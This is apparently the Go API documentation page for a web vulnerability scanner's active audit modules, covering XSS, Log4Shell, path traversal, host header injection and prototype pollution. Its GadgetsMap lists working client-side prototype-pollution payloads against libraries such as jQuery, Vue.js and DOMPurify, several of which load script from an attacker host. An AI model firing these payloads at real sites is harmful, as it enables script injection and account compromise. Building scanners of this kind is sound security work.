Documentation
¶
Index ¶
- Variables
- func ForbiddenBypassScan(history *db.History, options ActiveModuleOptions)
- func OpenRedirectScan(history *db.History, options ActiveModuleOptions, ...) (bool, error)
- func ScanHistoryItem(item *db.History, interactionsManager *integrations.InteractionsManager, ...)
- type ActiveModuleOptions
- type AlertAudit
- type ClientSidePrototypePollutionAudit
- type HTTPMethodsAudit
- type HeaderTest
- type HostHeaderInjectionAudit
- type HttpVersionScanResults
- type KnownGadget
- type Log4ShellInjectionAudit
- type PathTraversalAudit
- type SNIAudit
- type XSSAudit
- func (x *XSSAudit) GetHistory(url string) *db.History
- func (x *XSSAudit) IsDetectedLocation(url, parameter string) bool
- func (x *XSSAudit) Run(targetUrl string, params []string, wordlistPath string, urlEncode bool)
- func (x *XSSAudit) StoreDetectedLocation(url, parameter string)
- func (x *XSSAudit) TestUrlParamWithAlertPayload(item lib.ParameterAuditItem, b *rod.Browser) error
Constants ¶
This section is empty.
Variables ¶
View Source
var GadgetsMap = map[string]KnownGadget{ "Adobe Dynamic Tag Management": { Payloads: []string{ "__proto__[src]=data:,alert(1)//", }, Info: "", }, "Akamai Boomerang": { Payloads: []string{ "__proto__[BOOMR]=1&__proto__[url]=//attacker.tld/js.js", }, Info: "", }, "Closure": { Payloads: []string{ "__proto__[*%%20ONERROR]=1&__proto__[*%%20SRC]=1", "__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//", }, Info: "", }, "DOMPurify": { Payloads: []string{ "__proto__[ALLOWED_ATTR][0]=onerror&__proto__[ALLOWED_ATTR][1]=src", "__proto__[documentMode]=9", }, Info: "", }, "Embedly": { Payloads: []string{ "__proto__[onload]=alert(1)", }, Info: "", }, "jQuery": { Payloads: []string{ "__proto__[context]=<img/src/onerror%%3dalert(1)>&__proto__[jquery]=x", "__proto__[url][]=data:,alert(1)//&__proto__[dataType]=script", "__proto__[url]=data:,alert(1)//&__proto__[dataType]=script&__proto__[crossDomain]=", "__proto__[src][]=data:,alert(1)//", "__proto__[url]=data:,alert(1)//", "__proto__[div][0]=1&__proto__[div][1]=<img/src/onerror%%3dalert(1)>&__proto__[div][2]=1", "__proto__[preventDefault]=x&__proto__[handleObj]=x&__proto__[delegateTarget]=<img/src/onerror%%3dalert(1)>", }, Info: "", }, "js-xss": { Payloads: []string{ "__proto__[location]=https://attacker.tld/", }, Info: "", }, "Knockout.js": { Payloads: []string{ "__proto__[4]=a':1,[alert(1)]:1,'b&__proto__[5]=", }, Info: "", }, "Lodash <= 4.17.15": { Payloads: []string{ "__proto__[sourceURL]=%%E2%%80%A8%%E2%%80%%A9alert(1)", }, Info: "", }, "Marionette.js / Backbone.js": { Payloads: []string{ "__proto__[tagName]=img&__proto__[src][]=x:&__proto__[onerror][]=alert(1)", }, Info: "", }, "Google reCAPTCHA": { Payloads: []string{ "__proto__[srcdoc][]=<script>alert(1)</script>", }, Info: "", }, "sanitize-html": { Payloads: []string{ "__proto__[*][]=onload", "__proto__[innerText]=<script>alert(1)</script>", }, Info: "Displaying all possible payloads", }, "Segment Analytics.js": { Payloads: []string{ "__proto__[script][0]=1&__proto__[script][1]=<img/src/onerror%%3dalert(1)>&__proto__[script][2]=1", }, Info: "", }, "Sprint.js": { Payloads: []string{ "__proto__[div][intro]=<img%%20src%%20onerror%%3dalert(1)>", }, Info: "", }, "Swiftype Site Search": { Payloads: []string{ "__proto__[xxx]=alert(1)", }, Info: "", }, "Tealium Universal Tag": { Payloads: []string{ "__proto__[attrs][src]=1&__proto__[src]=//attacker.tld/js.js", }, Info: "", }, "Twitter Universal Website Tag": { Payloads: []string{ "__proto__[attrs][src]=1&__proto__[hif][]=javascript:alert(1)", }, Info: "", }, "Wistia Embedded Video": { Payloads: []string{ "__proto__[innerHTML]=<img/src/onerror=alert(1)>", }, Info: "", }, "Zepto.js": { Payloads: []string{ "__proto__[onerror]=alert(1)", }, Info: "", }, "Vue.js": { Payloads: []string{ "__proto__[v-if]=_c.constructor('alert(1)')()", "__proto__[attrs][0][name]=src&__proto__[attrs][0][value]=xxx&__proto__[xxx]=data:,alert(1)//&__proto__[is]=script", "__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()", "__proto__[data]=a&__proto__[template][nodeType]=a&__proto__[template][innerHTML]=<script>alert(1)</script>", `__proto__[props][][value]=a&__proto__[name]=":''.constructor.constructor('alert(1)')(),""`, "__proto__[template]=<script>alert(1)</script>", }, Info: "Displaying all possible payloads", }, "Popper.js": { Payloads: []string{ "__proto__[arrow][style]=color:red;transition:all%%201s&__proto__[arrow][ontransitionend]=alert(1)", "__proto__[reference][style]=color:red;transition:all%%201s&__proto__[reference][ontransitionend]=alert(2)", "__proto__[popper][style]=color:red;transition:all%%201s&__proto__[popper][ontransitionend]=alert(3)", }, Info: "Displaying all possible payloads", }, "Pendo Agent": { Payloads: []string{ "__proto__[dataHost]=attacker.tld/js.js%%23", }, Info: "", }, "i18next": { Payloads: []string{ "__proto__[lng]=cimode&__proto__[appendNamespaceToCIMode]=x&__proto__[nsSeparator]=<img/src/onerror%%3dalert(1)>", "__proto__[lng]=a&__proto__[a]=b&__proto__[obj]=c&__proto__[k]=d&__proto__[d]=<img/src/onerror%%3dalert(1)>", "__proto__[lng]=a&__proto__[key]=<img/src/onerror%%3dalert(1)>", }, Info: "Displaying all possible payloads", }, "Demandbase Tag": { Payloads: []string{ "__proto__[Config][SiteOptimization][enabled]=1&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?", }, Info: "", }, "Google Tag Manager plugin for analytics": { Payloads: []string{ "__proto__[customScriptSrc]=//attacker.tld/xss.js", }, Info: "", }, "CanJS deparam": { Payloads: []string{ "__proto__[test]=test", "?constructor[prototype][test]=test", }, Info: "Displaying all possible payloads", }, "jQuery parseParams": { Payloads: []string{ "__proto__.test=test", "?constructor.prototype.test=test", }, Info: "", }, "MooTools More": { Payloads: []string{ "__proto__[test]=test", "?constructor[prototype][test]=test", }, Info: "", }, "Mutiny": { Payloads: []string{ "__proto__.test=test", }, Info: "", }, "AMP": { Payloads: []string{ "__proto__.ampUrlPrefix=https://pastebin.com/raw/E9f7BSwb", }, Info: "There might be a possible RCE vulnerability.", }, }
Functions ¶
func ForbiddenBypassScan ¶
func ForbiddenBypassScan(history *db.History, options ActiveModuleOptions)
func OpenRedirectScan ¶
func OpenRedirectScan(history *db.History, options ActiveModuleOptions, insertionPoints []scan.InsertionPoint) (bool, error)
func ScanHistoryItem ¶
func ScanHistoryItem(item *db.History, interactionsManager *integrations.InteractionsManager, payloadGenerators []*generation.PayloadGenerator, options scan.HistoryItemScanOptions)
Types ¶
type ActiveModuleOptions ¶
type AlertAudit ¶
type AlertAudit struct {
WorkspaceID uint
TaskID uint
TaskJobID uint
SkipInitialAlertValidation bool
// contains filtered or unexported fields
}
func (*AlertAudit) GetHistory ¶
func (x *AlertAudit) GetHistory(id string) *db.History
func (*AlertAudit) Run ¶
func (x *AlertAudit) Run(history *db.History, insertionPoints []scan.InsertionPoint, wordlistPath string, issueCode db.IssueCode)
Run runs the audit using the given filesytem path to a wordlist
func (*AlertAudit) RunWithPayloads ¶
func (x *AlertAudit) RunWithPayloads(history *db.History, insertionPoints []scan.InsertionPoint, payloads []payloads.PayloadInterface, issueCode db.IssueCode)
RunWithPayloads runs the audit using the given payloads
type ClientSidePrototypePollutionAudit ¶
type ClientSidePrototypePollutionAudit struct {
HistoryItem *db.History
WorkspaceID uint
TaskID uint
TaskJobID uint
// contains filtered or unexported fields
}
func (*ClientSidePrototypePollutionAudit) GetHistory ¶
func (a *ClientSidePrototypePollutionAudit) GetHistory(url string) *db.History
func (*ClientSidePrototypePollutionAudit) Run ¶
func (a *ClientSidePrototypePollutionAudit) Run()
type HTTPMethodsAudit ¶
type HTTPMethodsAudit struct {
HistoryItem *db.History
Concurrency int
WorkspaceID uint
TaskID uint
TaskJobID uint
}
HTTPMethodsAudit configuration
func (*HTTPMethodsAudit) GetMethodsToTest ¶
func (a *HTTPMethodsAudit) GetMethodsToTest() (headers []string)
type HeaderTest ¶
type HostHeaderInjectionAudit ¶
type HostHeaderInjectionAudit struct {
URL string
Concurrency int
HeuristicRecords []fuzz.HeuristicRecord
ExpectedResponses fuzz.ExpectedResponses
ExtraHeadersToTest []string
WorkspaceID uint
TaskID uint
TaskJobID uint
}
HostHeaderInjectionAudit configuration
func (*HostHeaderInjectionAudit) GetDefaultHeadersToTest ¶
func (a *HostHeaderInjectionAudit) GetDefaultHeadersToTest() (headers []string)
GetDefaultHeadersToTest returns the default headers that are tested in this audit
func (*HostHeaderInjectionAudit) GetHeadersToTest ¶
func (a *HostHeaderInjectionAudit) GetHeadersToTest() (headers []string)
GetHeadersToTest merges the default headers to test and the provided ExtraHeadersToTest
func (*HostHeaderInjectionAudit) Run ¶
func (a *HostHeaderInjectionAudit) Run()
Run starts the audit
type HttpVersionScanResults ¶
func HttpVersionsScan ¶
func HttpVersionsScan(history *db.History, options ActiveModuleOptions) (HttpVersionScanResults, error)
type KnownGadget ¶
type Log4ShellInjectionAudit ¶
type Log4ShellInjectionAudit struct {
URL string
Concurrency int
HeuristicRecords []fuzz.HeuristicRecord
ExpectedResponses fuzz.ExpectedResponses
ExtraHeadersToTest []string
InteractionsManager *integrations.InteractionsManager
WorkspaceID uint
TaskID uint
TaskJobID uint
Mode scan.ScanMode
}
Log4ShellInjectionAudit configuration
func (*Log4ShellInjectionAudit) GetDefaultHeadersToTest ¶
func (a *Log4ShellInjectionAudit) GetDefaultHeadersToTest() (headers []string)
GetDefaultHeadersToTest returns the default headers that are tested in this audit
func (*Log4ShellInjectionAudit) GetHeadersToTest ¶
func (a *Log4ShellInjectionAudit) GetHeadersToTest() (headers []string)
GetHeadersToTest merges the default headers to test and the provided ExtraHeadersToTest
type PathTraversalAudit ¶
type PathTraversalAudit struct {
URL string
Concurrency int
Params []string
PayloadsDepth int
Platform string
StopAfterSuccess bool
OnlyCommonVulnerableParams bool
HeuristicRecords []fuzz.HeuristicRecord
ExpectedResponses fuzz.ExpectedResponses
}
PathTraversalAudit configuration
func (*PathTraversalAudit) ProcessResult ¶
func (a *PathTraversalAudit) ProcessResult(result *fuzz.FuzzResult)
ProcessResult processes a result to verify if it's vulnerable or not, this logic could be extracted to a differential analysis function
type SNIAudit ¶
type SNIAudit struct {
HistoryItem *db.History
InteractionsManager *integrations.InteractionsManager
WorkspaceID uint
TaskID uint
TaskJobID uint
}
SNIAudit configuration
type XSSAudit ¶
type XSSAudit struct {
WorkspaceID uint
TaskID uint
TaskJobID uint
// contains filtered or unexported fields
}
func (*XSSAudit) IsDetectedLocation ¶
func (*XSSAudit) StoreDetectedLocation ¶
func (*XSSAudit) TestUrlParamWithAlertPayload ¶
TestUrlParamWithAlertPayload opens a browser and sends a payload to a param and check if alert has opened
Source Files
Click to show internal directories.
Click to hide internal directories.